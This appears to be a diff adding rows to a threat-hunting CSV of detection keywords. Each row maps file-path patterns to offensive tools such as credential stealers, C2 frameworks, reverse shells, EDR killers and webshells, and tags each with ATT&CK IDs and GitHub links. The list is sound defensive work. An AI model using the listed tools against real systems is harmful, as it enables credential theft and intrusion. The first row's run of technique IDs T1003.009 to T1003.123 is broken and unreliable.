+"*/ShareFinder.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - 
T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*/Sharefinder.ps1","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*/shares-with-SCF.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/SharpAzbelt.git*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
+"*/SharpBlackout.git*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z"
+"*/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/SharpCalendar/*.*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z"
+"*/SharpCat/*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z"
+"*/SharpChromium.git*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z"
+"*/SharpCloud.git*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS 
- Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z"
+"*/SharpCollection/*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*/SharpCompile/*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*/sharpcompile_*.*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z"
+"*/SharpCradle/*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z"
+"*/SharpDomainSpray.git*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*/SharpDoor.cs*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
+"*/SharpDoor.git*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
+"*/SharpDPAPI.git*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z"
+"*/SharpDump*","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*/SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
+"*/SharpExfiltrate.git*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*/SharpExfiltrate/*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*/SharpGmailC2.git*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - 
TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
+"*/SharpHandler.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/SharpHide.git*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z"
+"*/SharpLDAP.git*","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","8","1","50","7","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z"
+"*/SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z"
+"*/SharpRDP.git*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - 
TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*/SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z"
+"*/SharpShares/Enums*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z"
+"*/SharpShellPipe.git*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z"
+"*/SharpSocks*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z"
+"*/SharpSploit*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 
- T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*/SharpSploit/*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z"
+"*/SharpSpoolTrigger*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z"
+"*/SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*/SharpStay.git*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
+"*/SharpStay/*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z"
+"*/SharpSword.git*","offensive_tool_keyword","SharpSword","Read the contents 
of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z"
+"*/SharpSword/SharpSword*","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","110","13","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z"
+"*/SharpSystemTriggers*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z"
+"*/SharpTerminator/*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - 
T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z"
+"*/SharpUnhooker.git*","offensive_tool_keyword","SharpUnhooker","C# Based Universal API Unhooker","T1055.012 - T1070.004 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GetRektBoy724/SharpUnhooker","1","1","N/A","9","4","365","103","2022-02-18T13:11:11Z","2021-05-17T01:33:38Z"
+"*/SharpView.git*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z"
+"*/SharpWSUS*","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for lateral movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","408","63","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z"
+"*/SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"*/shell/password.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z"
+"*/shell/shell_port.*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*/shell_exec.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/Shell3er/*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z"
+"*/shellcode*loader.bin*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/shellcode.bin*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
